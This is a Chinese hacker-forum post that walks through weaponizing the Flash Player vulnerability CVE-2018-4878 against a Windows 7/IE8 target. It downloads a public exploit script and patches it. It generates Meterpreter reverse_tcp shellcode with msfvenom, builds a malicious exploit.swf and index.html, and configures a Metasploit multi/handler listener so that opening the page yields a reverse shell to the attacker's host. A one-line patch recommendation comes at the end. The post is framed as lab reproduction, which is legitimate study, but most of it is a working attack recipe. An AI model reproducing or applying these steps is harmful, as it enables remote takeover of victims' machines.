跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Flash 0day CVE-2018-4878 漏洞复现

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于
 

0x01 前言

Adobe公司在当地时间201821日发布了一条安全公告:

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。

0x02 漏洞影响

Flash Player当前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现

环境测试:

攻击机:kali 

目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137

1.下载cve-2018-4878的脚步利用

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

2.解压压缩文件后,可看到cve-2018-4878.pyexploit.swf

1049983-20180307163356003-1342545925.jpg
3.我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git

1049983-20180307163550588-374871125.png

 

4.其次需要修改替换原来弹计算器的shellcode

1049983-20180307163428979-895542889.jpg

5.kali下生成msfshellcode:

msfvenom  -pwindows/meterpreter/reverse_tcplhost=your host  lport=your port  -fpython>shellcode.txt

1049983-20180307163431695-1866779349.jpg

6.将生成的shellcode替换掉原有cve-2018-4878.py中的shelldoce即可

1049983-20180307163434046-1542699432.jpg

7.kal下执行cve-2018-4878.py,这里需要和index.html在一个目录下,即可生成恶意的exploit.swf

1049983-20180307163436396-1516482444.jpg

8.这里为了演示我将index.htmlexploit.swf一同拷贝到目标靶机win7x64上,在ie浏览器下打开(也可以通过搭建web服务器的形式将index.htmlexploit.swf放在web目录下,访问地址来打开)。

1049983-20180307163438731-1038835026.jpg

9.msf 下进行监听设置

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost  10.0.0.217

msf exploit(handler) > set lport  443

msf exploit(handler) > exploit

 

1049983-20180307163440686-1971276193.jpg

10.当打开目标恶意的index.html页面时,即可触发反弹shell

1049983-20180307163443015-1404083733.jpg

 

0x04 漏洞修复

建设通过官方网站升级到最新版本

https://get.adobe.com/cn/flashplayer/

 

 

 
 
 
 



 





创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。